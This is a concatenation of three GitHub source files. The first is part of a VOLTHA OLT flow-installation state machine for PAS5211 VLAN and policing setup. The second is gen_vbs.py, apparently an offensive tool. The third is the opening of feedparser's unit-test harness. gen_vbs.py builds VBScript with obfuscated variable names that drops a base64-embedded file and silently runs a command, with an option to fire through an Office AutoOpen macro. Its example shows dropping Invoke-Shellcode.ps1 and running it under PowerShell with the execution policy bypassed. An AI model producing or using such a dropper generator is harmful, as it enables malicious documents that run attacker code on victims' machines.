self.send_set_uplink_vlan_handling(self.device.device, self.port_id, self.cvlan_id, self.svlan_id)
raise self.wait_set_uplink_vlan_handling_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_uplink_vlan_handling_response, TIMEOUT)
def timeout_wait_set_uplink_vlan_handling_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_uplink_vlan_handling(self.device.device, self.port_id, self.cvlan_id, self.svlan_id)
else:
raise self.error("Timeout for message PAS5211SetUplinkVlanHandlResponse")
@ATMT.receive_condition(wait_set_uplink_vlan_handling_response)
def wait_for_set_uplink_vlan_handling_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetUplinkVlanHandlResponse in pkt:
log.debug('[RESPONSE] PAS5211SetUplinkVlanHandlResponse')
self.send_set_gen_vlan_downlink_configuration(self.device.device)
raise self.wait_set_gen_vlan_downlink_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_gen_vlan_downlink_configuration_response, TIMEOUT)
def timeout_wait_set_gen_vlan_downlink_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_gen_vlan_downlink_configuration(self.device.device)
else:
raise self.error("Timeout for message PAS5211SetVlanGenConfigResponse")
@ATMT.receive_condition(wait_set_gen_vlan_downlink_configuration_response)
def wait_for_set_gen_vlan_downlink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanGenConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanGenConfigResponse')
self.send_set_vlan_downlink_configuration(self.device.device, self.svlan_id)
raise self.wait_set_vlan_downlink_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_vlan_downlink_configuration_response, TIMEOUT)
def timeout_wait_set_vlan_downlink_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_vlan_downlink_configuration(self.device.device, self.svlan_id)
else:
raise self.error("Timeout for message PAS5211SetVlanDownConfigResponse")
@ATMT.receive_condition(wait_set_vlan_downlink_configuration_response)
def wait_for_set_vlan_downlink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanDownConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanDownConfigResponse')
self.send_set_downlink_vlan_handling(self.device.device, self.cvlan_id, self.svlan_id, self.port_id)
raise self.wait_set_downlink_vlan_handling_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_downlink_vlan_handling_response, TIMEOUT)
def timeout_wait_set_downlink_vlan_handling_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_downlink_vlan_handling(self.device.device, self.cvlan_id, self.svlan_id, self.port_id)
else:
raise self.error("Timeout for message PAS5211SetDownVlanHandlResponse")
@ATMT.receive_condition(wait_set_downlink_vlan_handling_response)
def wait_for_set_downlink_vlan_handling_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetDownVlanHandlResponse in pkt:
log.debug('[RESPONSE] PAS5211SetDownVlanHandlResponse')
self.send_get_port_id_downlink_policing(self.device.device, self.port_id)
raise self.wait_get_port_id_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_get_port_id_downlink_policing_response, TIMEOUT)
def timeout_wait_get_port_id_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_get_port_id_downlink_policing(self.device.device, self.port_id)
else:
raise self.error("Timeout for message PAS5211GetPortIdDownstreamPolicingConfigResponse")
@ATMT.receive_condition(wait_get_port_id_downlink_policing_response)
def wait_for_get_port_id_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211GetPortIdDownstreamPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211GetPortIdDownstreamPolicingConfigResponse')
if pkt[PAS5211GetPortIdDownstreamPolicingConfigResponse].ds_policing_config_id != PMC_OFAL_NO_POLICY:
self.policy_id = pkt[PAS5211GetPortIdDownstreamPolicingConfigResponse].ds_policing_config_id
log.debug('Policy id got: {}'.format(self.policy_id))
self.send_unset_port_id_downlink_policing(self.device.device, 1, self.port_id)
raise self.wait_unset_port_id_downlink_policing_response()
else:
                self.send_set_downlink_policing(self.device.device, self.downlink_bandwidth)
raise self.wait_set_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_unset_port_id_downlink_policing_response, TIMEOUT)
def timeout_wait_unset_port_id_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_unset_port_id_downlink_policing(self.device.device, 1, self.port_id)
else:
raise self.error("Timeout for message PAS5211UnsetPortIdPolicingConfigResponse")
@ATMT.receive_condition(wait_unset_port_id_downlink_policing_response)
def wait_for_unset_port_id_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211UnsetPortIdPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211UnsetPortIdPolicingConfigResponse')
self.send_remove_downlink_policing(self.device.device, self.policy_id)
raise self.wait_remove_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_remove_downlink_policing_response, TIMEOUT)
def timeout_wait_remove_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_remove_downlink_policing(self.device.device, self.policy_id)
else:
raise self.error("Timeout for message PAS5211RemoveDownstreamPolicingConfigResponse")
@ATMT.receive_condition(wait_remove_downlink_policing_response)
def wait_for_remove_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211RemoveDownstreamPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211RemoveDownstreamPolicingConfigResponse')
self.send_set_downlink_policing(self.device.device, self.downlink_bandwidth)
raise self.wait_set_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_downlink_policing_response, TIMEOUT)
def timeout_wait_set_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_downlink_policing(self.device.device, self.downlink_bandwidth)
else:
raise self.error("Timeout for message PAS5211SetDownstreamPolicingConfigResponse")
@ATMT.receive_condition(wait_set_downlink_policing_response)
def wait_for_set_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetDownstreamPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetDownstreamPolicingConfigResponse')
# if pkt[PAS5211SetDownstreamPolicingConfigResponse].policing_config_id:
self.policy_id = pkt[PAS5211SetDownstreamPolicingConfigResponse].policing_config_id
log.debug('Policy id set: {}'.format(self.policy_id))
self.send_set_port_id_policing(self.device.device, 1, self.port_id, self.policy_id)
raise self.wait_set_port_id_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_port_id_policing_response, TIMEOUT)
def timeout_wait_set_port_id_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_port_id_policing(self.device.device, 1, self.port_id, self.policy_id)
else:
raise self.error("Timeout for message PAS5211SetPortIdPolicingConfigResponse")
@ATMT.receive_condition(wait_set_port_id_policing_response)
def wait_for_set_port_id_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetPortIdPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetPortIdPolicingConfigResponse')
raise self.end()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
def send_set_port_id_configuration(self, device, activate, port_id, alloc_id):
msg = PAS5211MsgSetPortIdConfig(
# port_id=1000 + device.proxy_address.onu_id,
port_id=port_id,
activate=activate,
alloc_id=alloc_id,
type=PON_PORT_TYPE_GEM,
destination=PON_PORT_DESTINATION_CNI0
)
self.send(self.px(msg))
log.debug("[SENT] PASS_set_port_id_configuration")
def send_get_onu_id_by_port_id(self, device, port_id):
msg = PAS5211MsgGetOnuIdByPortId(
# port_id=1000 + device.proxy_address.onu_id
port_id=port_id
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211MsgGetOnuIdByPortId")
def send_set_gen_vlan_uplink_configuration(self, device):
# transmit "vlan uplink configuration port-id 1001 min-cos 0 max-cos 7
# de-bit disable primary-tag-handling true"
msg = PAS5211SetVlanGenConfig(
direction=0,
extended_svlan_type=33024,
insertion_svlan_ethertype=33024,
extended_cvlan_type=33024,
insertion_cvlan_ethertype=33024,
pon_pcp_code=3,
cni_pcp_code=3,
reserved=0,
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanGenConfig")
def send_set_gen_vlan_downlink_configuration(self, device):
# transmit "vlan uplink configuration port-id 1001 min-cos 0 max-cos 7
# de-bit disable primary-tag-handling true"
msg = PAS5211SetVlanGenConfig(
direction=1,
extended_svlan_type=33024,
insertion_svlan_ethertype=33024,
extended_cvlan_type=33024,
insertion_cvlan_ethertype=33024,
pon_pcp_code=3,
cni_pcp_code=3,
reserved=0,
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanGenConfig")
def send_set_vlan_uplink_configuration(self, device, port_id):
# transmit "vlan uplink configuration port-id 1001 min-cos 0 max-cos 7
# de-bit disable primary-tag-handling true"
msg = PAS5211SetVlanUplinkConfiguration(
# port_id=(1000 + device.proxy_address.onu_id),
            port_id=port_id,
pvid_config_enabled=PON_TRUE,
# Enables handling of primary tag in addition to the port-id at
# uplink frames
min_cos=0, # The lower limit of the priority uplink frame from the specific Port Id can get
max_cos=7, # The upper limit of the priority uplink frame from the specific Port Id can get
de_bit=PON_DISABLE # Discard Eligibility (DE) enabled
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanUplinkConfiguration")
def send_set_uplink_vlan_handling(self, device, port_id, cvlan_id, svlan_id):
# if (ul_vlan_key->primary_vid == PON_VLAN_UNUSED_TAG)
# set_uplink_vlan_handling_msg.pvid_config_enabled = PON_FALSE;
# else
# {
# set_uplink_vlan_handling_msg.pvid_config_enabled = PON_TRUE;
# set_uplink_vlan_handling_msg.primary_vid = ul_vlan_key->primary_vid;
# }
primary_vid = 0 # TODO change
# self.port_id = (1000 + device.proxy_address.onu_id) # TODO change
if cvlan_id == PON_VLAN_UNUSED_TAG:
pvid_config_enabled = PON_FALSE
else:
pvid_config_enabled = PON_TRUE
primary_vid = cvlan_id
msg = PAS5211SetUplinkVlanHandl(
source_port_id=port_id,
primary_vid=primary_vid, # The primary VLAN tag of the uplink frame
pvid_config_enabled=pvid_config_enabled,
svlan_tag_operation=PON_VLAN_CHANGE_TAG,
cvlan_tag_operation=PON_VLAN_DONT_CHANGE_TAG, # Customer tag = new C-VLAN tag
new_svlan_tag=svlan_id, # Service tag to be added or replace, not relevant
new_cvlan_tag=0, # Customer tag to be added or replace, not relevant
destination=PON_VLAN_DEST_DATAPATH # Frames go to the CNI
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetUplinkVlanHandl")
def send_set_svlan_at_configuration(self, device, svlan_id):
msg = PAS5211SetSVlanAtConfig(
svlan_id=svlan_id, # 9
# 1 1:1 VLAN mode is used, no address table
forwarding_mode=PON_1_TO_1_VLAN_MODE,
use_svlan=PON_FALSE, # Use S-VLAN as part of the address table key
use_cvlan=PON_FALSE, # Use C-VLAN as part of the address table key
use_pbits=PON_FALSE, # Use priority bits as part of the address table key
discard_unknown=PON_FALSE # Forward frames
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetSVlanAtConfig")
def send_set_vlan_downlink_configuration(self, device, svlan_id):
msg = PAS5211SetVlanDownConfig(
svlan_id=svlan_id, # 9
double_tag_handling=PON_TRUE, # Enable handling according to double tag
vlan_priority_handling=PON_TRUE # Use VLAN priority at the downlink VLAN table key
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanDownConfig")
def send_get_port_id_downlink_policing(self, device, port_id):
msg = PAS5211GetPortIdDownstreamPolicingConfig(port_id=port_id)
self.send(self.px(msg))
log.debug("[SENT] PAS5211GetPortIdDownstreamPolicingConfig")
def send_remove_downlink_policing(self, device, policy_id):
msg = PAS5211RemoveDownstreamPolicingConfig(
policing_config_id=policy_id,
reserved=0)
self.send(self.px(msg))
log.debug("[SENT] PAS5211RemoveDownstreamPolicingConfig")
def send_unset_port_id_downlink_policing(self, device, dir, port_id):
msg = PAS5211UnsetPortIdPolicingConfig(direction=dir, port_id=port_id)
self.send(self.px(msg))
log.debug("[SENT] PAS5211UnsetPortIdPolicingConfig")
def send_set_downlink_policing(self, device, bandwidth):
        msg = PAS5211SetDownstreamPolicingConfig(
            committed_bandwidth=SLA_gr_bw_gros * 1024,
            excessive_bandwidth=(bandwidth - SLA_gr_bw_gros) * 1024,
            committed_burst_limit=256,
            excessive_burst_limit=256)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetDownstreamPolicingConfig")
def send_set_port_id_policing(self, device, dir, port_id, policy_id):
msg = PAS5211SetPortIdPolicingConfig(
direction=dir,
port_id=port_id,
policing_config_id=policy_id,
reserved=0)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetPortIdPolicingConfig")
def send_send_dba_algorithm_msg(self, device, port_id, bandwidth):
alloc_id = []
mx_bw = []
gr_bw = []
data = pack('<LLHHBBBB', PYTHAGORAS_UPDATE_AID_SLA,
port_id, SLA_gr_bw_gros, bandwidth,
SLA_gr_bw_fine, SLA_be_bw_fine, PYTHAGORAS_DBA_DATA_COS,
PYTHAGORAS_DBA_STATUS_REPORT_NSR)
        msg = PAS5211MsgSendDbaAlgorithmMsg(data=data)
self.send(self.px(msg))
log.debug("[SENT] PAS5211MsgSendDbaAlgorithmMsg")
def send_set_downlink_vlan_handling(self, device, cvlan_id, svlan_id, port_id):
cvlan_tag = 0
svlan_tag = svlan_id
if cvlan_id == PON_VLAN_UNUSED_TAG:
double_tag_handling = PON_FALSE
else:
double_tag_handling = PON_TRUE
cvlan_tag = cvlan_id
input_priority = 0 # TODO: Extract value from somewhere
if input_priority == PON_VLAN_UNUSED_PRIORITY:
priority_handling = PON_FALSE
else:
priority_handling = PON_TRUE
output_priority = 0 # TODO: Extract value from somewhere
if output_priority == PON_VLAN_REPLACE_PRIORITY:
output_vlan_prio_handle = PON_OUTPUT_VLAN_PRIO_HANDLE_INCOMING_VLAN
output_priority = 0
elif output_priority == PON_VLAN_UNCHANGED_PRIORITY:
output_vlan_prio_handle = PON_OUTPUT_VLAN_PRIO_HANDLE_DONT_CHANGE
output_priority = 0
else:
output_vlan_prio_handle = PON_OUTPUT_VLAN_PRIO_HANDLE_DL_VLAN_TABLE
msg = PAS5211SetDownVlanHandl(
svlan_tag=svlan_tag,
cvlan_tag=cvlan_tag, # Original downlink frame with this C-tag ID
double_tag_handling=PON_TRUE,
priority_handling=PON_FALSE,
input_priority=1, # From traces # S-VLAN priority field
# Don't change original frame service tag
svlan_tag_operation=PON_DL_VLAN_SVLAN_REMOVE,
cvlan_tag_operation=PON_DL_VLAN_CVLAN_NO_CHANGE, # Customer tag = new C-VLAN tag
# port_id=(1000 + device.proxy_address.onu_id),
port_id=port_id,
# GEM port-id destination of the downlink frame. It is used when
# the MAC destination address (DA) is a broadcast address
new_cvlan_tag=cvlan_tag, # Same as cvlan_tag
# From traces PON_VLAN_DEST_DATAPATH, # Frames go to the PON
destination=PON_VLAN_DEST_DATAPATH,
output_vlan_prio_handle=PON_OUTPUT_VLAN_PRIO_HANDLE_DONT_CHANGE,
output_priority=1 # New VLAN priority value
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetDownVlanHandl")
|
{
"content_hash": "aaea026f0229f0045f5c330b39cf7b75",
"timestamp": "",
"source": "github",
"line_count": 711,
"max_line_length": 176,
"avg_line_length": 45.17862165963432,
"alnum_prop": 0.6630346802814271,
"repo_name": "opencord/voltha",
"id": "8a529bcfda850ea1237b5733a5669bf998a9dcb5",
"size": "32722",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "voltha/adapters/microsemi_olt/OltInstallFlowStateMachine.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "30265"
},
{
"name": "Dockerfile",
"bytes": "2881"
},
{
"name": "Go",
"bytes": "181529"
},
{
"name": "Jinja",
"bytes": "25855"
},
{
"name": "Makefile",
"bytes": "76329"
},
{
"name": "Python",
"bytes": "9758796"
},
{
"name": "RobotFramework",
"bytes": "10188"
},
{
"name": "Ruby",
"bytes": "1126"
},
{
"name": "Shell",
"bytes": "758475"
},
{
"name": "XSLT",
"bytes": "175917"
}
],
"symlink_target": ""
}
|
import argparse
import random
import re
import sys
import binascii
class vbs_gen:
def __init__(self, args):
self.vb_code = ""
self.args = args
        if not args.cmd and not args.inputFile:
            sys.stderr.write("Error: must execute a command or write a file (or both). See --help\n")
            sys.exit(1)
self.create_vartable()
self.genvbs_header()
self.genvbs_getTemp()
if self.args.inputFile:
self.genvbs_writefile()
if self.args.cmd:
self.genvbs_execfile()
self.genvbs_invokecode()
print self.vb_code
    # returns a random lowercase string of the given length
def rand_alpha(self, strlength=10):
word = ""
for i in range(0,strlength):
word += chr(random.randint(0x61, 0x7a))
return word
def create_vartable(self):
self.var_dict = {}
#randomized vbscript variables to make the output slightly less intuitive to read
self.var_dict['base64'] = self.rand_alpha()
self.var_dict['binaryStream'] = self.rand_alpha()
self.var_dict['cmd'] = self.rand_alpha()
self.var_dict['colEnvironment'] = self.rand_alpha()
self.var_dict['decodeBase64'] = self.rand_alpha()
self.var_dict['envObj'] = self.rand_alpha()
self.var_dict['execfile'] = self.rand_alpha()
self.var_dict['getVar'] = self.rand_alpha()
self.var_dict['objshell'] = self.rand_alpha()
self.var_dict['objPath'] = self.rand_alpha()
self.var_dict['runObj'] = self.rand_alpha()
self.var_dict['sc'] = self.rand_alpha()
self.var_dict['sysPath'] = self.rand_alpha()
self.var_dict['tempPath'] = self.rand_alpha()
self.var_dict['writeBytes'] = self.rand_alpha()
self.var_dict['writeFile'] = self.rand_alpha()
def getvar(self, var):
if var not in self.var_dict:
raise Exception("Bad variable")
if self.args.debug:
return var
else:
return self.var_dict[var]
def genvbs_header(self):
self.vb_code += """
Option Explicit
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
"""
def genvbs_getTemp(self):
self.vb_code += "\n"
self.vb_code += "Private Function " + self.getvar("getVar") + "(mvar)\n"
self.vb_code += " Dim " + self.getvar("objshell") + "\n"
self.vb_code += " Dim " + self.getvar("envObj") + "\n"
self.vb_code += " Set " + self.getvar("objshell") + " = CreateObject(\"WScript.Shell\")\n"
self.vb_code += " Set " + self.getvar("envObj") + " = " + self.getvar("objshell") + ".Environment(\"PROCESS\")\n"
self.vb_code += " " + self.getvar("getVar") + " = " + self.getvar("envObj") + "(mvar)\n"
self.vb_code += "End Function\n"
    # creates a few helper functions; the most useful is the 'writeFile' sub
def genvbs_writefile(self):
#decode base64 and writeBytes functions
self.vb_code += "\n"
self.vb_code += "Private Function " + self.getvar("decodeBase64") + "(" + self.getvar("base64") + ")\n"
self.vb_code += " Dim DM, EL\n"
self.vb_code += " Set DM = CreateObject(\"Microsoft.XMLDOM\")\n"
self.vb_code += " Set EL = DM.createElement(\"tmp\")\n"
self.vb_code += " EL.DataType = \"bin.base64\"\n"
self.vb_code += " EL.Text = " + self.getvar("base64") + "\n"
self.vb_code += " " + self.getvar("decodeBase64") + " = EL.NodeTypedValue\n"
self.vb_code += "End Function\n"
self.vb_code += "\n"
self.vb_code += "Private Sub " + self.getvar("writeBytes") + "(file, bytes)\n"
self.vb_code += " Dim " + self.getvar("binaryStream") + "\n"
self.vb_code += " Set " + self.getvar("binaryStream") + " = CreateObject(\"ADODB.Stream\")\n"
self.vb_code += " " + self.getvar("binaryStream") + ".Type = TypeBinary\n"
self.vb_code += " " + self.getvar("binaryStream") + ".Open\n"
self.vb_code += " " + self.getvar("binaryStream") + ".Write bytes\n"
self.vb_code += " " + self.getvar("binaryStream") + ".SaveToFile file, ForWriting\n"
self.vb_code += "End Sub\n"
self.vb_code += "\n"
shellcode = open(self.args.inputFile, 'rb').read()
b64_shell = shellcode.encode("base64").split("\n")
sc_str = " Dim " + self.getvar("sc") + "\n"
for line in b64_shell:
if line == "":
continue
sc_str += " " + self.getvar("sc") + " = " + self.getvar("sc") + " & \"" + line + "\"\n"
self.vb_code += "Private Sub " + self.getvar("writeFile") + "()\n "
self.vb_code += sc_str +"\n"
self.vb_code += " Dim decbytes\n"
self.vb_code += " decbytes = " + self.getvar("decodeBase64") + "(" + self.getvar("sc") + ")\n"
self.vb_code += " Dim outFile\n"
self.vb_code += " outFile = \"" + self.args.writeFilePath + "\"\n"
self.vb_code += "\n"
self.vb_code += " outFile = UCase(outFile)\n"
self.vb_code += " outFile = Replace(outFile,\"%TEMP%\", " + self.getvar("getVar") + "(\"temp\"))\n"
self.vb_code += " outFile = Replace(outFile,\"%SYSTEMROOT%\", " + self.getvar("getVar") + "(\"windir\"))\n"
self.vb_code += " " + self.getvar("writeBytes") + " outFile, decbytes\n"
self.vb_code += "End Sub\n"
self.vb_code += "\n"
def genvbs_execfile(self):
self.vb_code += "Private Sub " + self.getvar("execfile") + "()\n"
self.vb_code += " Dim " + self.getvar("cmd") + "\n"
self.vb_code += " " + self.getvar("cmd") + " = \"" + self.args.cmd + "\"\n"
self.vb_code += " " + self.getvar("cmd") + " = Replace(" + self.getvar("cmd") + ", \"%TEMP%\", " + self.getvar("getVar") + "(\"temp\"))\n"
self.vb_code += " " + self.getvar("cmd") + " = Replace(" + self.getvar("cmd") + ", \"%SYSTEMROOT%\", " + self.getvar("getVar") + "(\"windir\"))\n"
self.vb_code += " Dim " + self.getvar("runObj") + "\n"
self.vb_code += " Set " + self.getvar("runObj") + " = CreateObject(\"Wscript.Shell\")\n"
self.vb_code += " " + self.getvar("runObj") + ".run " + self.getvar("cmd") + ", 0, true\n"
self.vb_code += "End Sub\n"
self.vb_code += " \n"
def genvbs_invokecode(self):
self.vb_code += "\n"
        # wrap the call in an AutoOpen function
if self.args.office:
self.vb_code += "Sub AutoOpen()\n"
if self.args.inputFile:
self.vb_code += self.getvar("writeFile") + "\n"
if self.args.cmd:
self.vb_code += self.getvar("execfile") + "\n"
if self.args.office:
self.vb_code += "End Sub\n"
desc = """simple script that generates vbs files that upload binaries and execute things
%TEMP% and %SYSTEMROOT% (case sensative) can be used"""
examples = """
Example:
python gen_vbs.py --cmd="C:\\Windows\\System32\\calc.exe"
Example:
python gen_vbs.py --inputFile ./Invoke-Shellcode.ps1 --writeFilePath="%TEMP%\\invoke_ping.ps1" \\
--cmd="%SYSTEMROOT%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -executionpolicy bypass \\
%TEMP%\\invoke_ping.ps1"
"""
parser = argparse.ArgumentParser(description=desc, epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--cmd', required=False, help='command to run, including args (e.g. "cmd.exe /K dir")')
parser.add_argument('--debug', action="store_true", help='does not obfuscate variable names, so output is easier to read')
parser.add_argument('--office', action="store_true", help='Wraps main in an AutoOpen function that is called when a doc is opened')
parser.add_argument('--inputFile', required=False, help="local file whose contents will be written to the host; if omitted nothing is written")
parser.add_argument('--writeFilePath', default=".\\ping.ps1", required=False, help='path the file will be written to on the host')
args = parser.parse_args()
vbs_gen(args)
|
{
"content_hash": "3d6a612e8d3ceac3eb3e42bdb9cd0dce",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 149,
"avg_line_length": 41.5819209039548,
"alnum_prop": 0.6188858695652174,
"repo_name": "zigitax/webstersprodigy",
"id": "f0b75a40179daf371bd04bcd0ffd5805513f8a7d",
"size": "7496",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "misc/gen_vbs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "643"
},
{
"name": "Python",
"bytes": "61737"
}
],
"symlink_target": ""
}
|
__author__ = "Mark Pilgrim <http://diveintomark.org/>"
__license__ = """
Copyright (c) 2010-2012 Kurt McKee <contactme@kurtmckee.org>
Copyright (c) 2004-2008 Mark Pilgrim
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE."""
import codecs
import datetime
import glob
import operator
import os
import posixpath
import pprint
import re
import struct
import sys
import threading
import time
import unittest
import urllib
import warnings
import zlib
import BaseHTTPServer
import SimpleHTTPServer
import feedparser
if not feedparser._XML_AVAILABLE:
sys.stderr.write('No XML parsers available, unit testing can not proceed\n')
sys.exit(1)
try:
# the utf_32 codec was introduced in Python 2.6; it's necessary to
# check this as long as feedparser supports Python 2.4 and 2.5
codecs.lookup('utf_32')
except LookupError:
_UTF32_AVAILABLE = False
else:
_UTF32_AVAILABLE = True
_s2bytes = feedparser._s2bytes
_l2bytes = feedparser._l2bytes
#---------- custom HTTP server (used to serve test feeds) ----------
_PORT = 8097 # not really configurable, must match hardcoded port in tests
_HOST = '127.0.0.1' # also not really configurable
class FeedParserTestRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
headers_re = re.compile(_s2bytes(r"^Header:\s+([^:]+):(.+)$"), re.MULTILINE)
def send_head(self):
"""Send custom headers defined in test case
Example:
<!--
Header: Content-type: application/atom+xml
Header: X-Foo: bar
-->
"""
# Short-circuit the HTTP status test `test_redirect_to_304()`
if self.path == '/-/return-304.xml':
self.send_response(304)
self.send_header('Content-type', 'text/xml')
self.end_headers()
return feedparser._StringIO(u''.encode('utf-8'))
path = self.translate_path(self.path)
# the compression tests' filenames determine the header sent
if self.path.startswith('/tests/compression'):
if self.path.endswith('gz'):
headers = {'Content-Encoding': 'gzip'}
else:
headers = {'Content-Encoding': 'deflate'}
headers['Content-type'] = 'application/xml'
else:
headers = dict([(k.decode('utf-8'), v.decode('utf-8').strip()) for k, v in self.headers_re.findall(open(path, 'rb').read())])
f = open(path, 'rb')
if (self.headers.get('if-modified-since') == headers.get('Last-Modified', 'nom')) \
or (self.headers.get('if-none-match') == headers.get('ETag', 'nomatch')):
status = 304
else:
status = 200
headers.setdefault('Status', status)
self.send_response(int(headers['Status']))
headers.setdefault('Content-type', self.guess_type(path))
self.send_header("Content-type", headers['Content-type'])
self.send_header("Content-Length", str(os.stat(f.name)[6]))
for k, v in headers.items():
if k not in ('Status', 'Content-type'):
self.send_header(k, v)
self.end_headers()
return f
def log_request(self, *args):
pass
class FeedParserTestServer(threading.Thread):
"""HTTP Server that runs in a thread and handles a predetermined number of requests"""
def __init__(self, requests):
threading.Thread.__init__(self)
self.requests = requests
self.ready = threading.Event()
def run(self):
self.httpd = BaseHTTPServer.HTTPServer((_HOST, _PORT), FeedParserTestRequestHandler)
self.ready.set()
while self.requests:
self.httpd.handle_request()
self.requests -= 1
self.ready.clear()
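# A minimal usage sketch (hedged): start the server thread for N requests,
# wait until it is listening, then fetch a test feed over HTTP. The feed path
# below is hypothetical.
#
#   server = FeedParserTestServer(1)
#   server.start()
#   server.ready.wait()
#   result = feedparser.parse('http://%s:%s/tests/some_feed.xml' % (_HOST, _PORT))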
#---------- dummy test case class (test methods are added dynamically) ----------
unicode1_re = re.compile(_s2bytes(" u'"))
unicode2_re = re.compile(_s2bytes(' u"'))
# _bytes is only used in everythingIsUnicode().
# In Python 2 it's str, and in Python 3 it's bytes.
_bytes = type(_s2bytes(''))
def everythingIsUnicode(d):
"""Takes a dictionary, recursively verifies that every value is unicode"""
for k, v in d.iteritems():
if isinstance(v, dict) and k != 'headers':
if not everythingIsUnicode(v):
return False
elif isinstance(v, list):
for i in v:
if isinstance(i, dict) and not everythingIsUnicode(i):
return False
elif isinstance(i, _bytes):
return False
elif isinstance(v, _bytes):
return False
return True
def failUnlessEval(self, xmlfile, evalString, msg=None):
"""Fail unless eval(evalString, env)"""
env = feedparser.parse(xmlfile)
try:
if not eval(evalString, globals(), env):
failure=(msg or 'not eval(%s) \nWITH env(%s)' % (evalString, pprint.pformat(env)))
raise self.failureException, failure
if not everythingIsUnicode(env):
raise self.failureException, "not everything is unicode \nWITH env(%s)" % (pprint.pformat(env), )
except SyntaxError:
# Python 3 doesn't have the `u""` syntax, so evalString needs to be modified,
# which will require the failure message to be updated
